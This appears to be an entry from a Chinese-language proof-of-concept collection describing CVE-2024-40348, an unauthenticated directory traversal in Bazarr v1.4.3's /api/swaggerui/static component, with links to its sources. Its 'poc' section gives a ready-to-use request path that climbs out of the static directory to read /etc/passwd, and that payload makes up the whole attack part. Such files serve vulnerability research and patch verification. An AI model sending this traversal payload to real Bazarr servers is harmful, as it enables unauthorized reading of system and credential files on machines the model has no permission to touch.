POC/wpoc/Bazarr/Bazarr任意文件读取(CVE-2024-40348).md

# Bazarr任意文件读取(CVE-2024-40348)

Bazaar v1.4.3 的组件 /api/swaggerui/static 中存在一个问题，允许未经身份验证的攻击者执行目录遍历。

## poc

```yaml
/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
```



## 漏洞来源

- https://www.seebug.org/vuldb/ssvid-99863
- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md